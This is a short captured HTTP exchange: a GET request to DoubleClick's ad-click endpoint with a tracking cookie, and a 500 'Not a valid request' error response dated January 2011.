GET /clk HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 500 Error: Not a valid request Content-Type: text/html Content-Length: 45 Date: Thu, 20 Jan 2011 00:35:31 GMT Server: GFE/2.0 Connection: close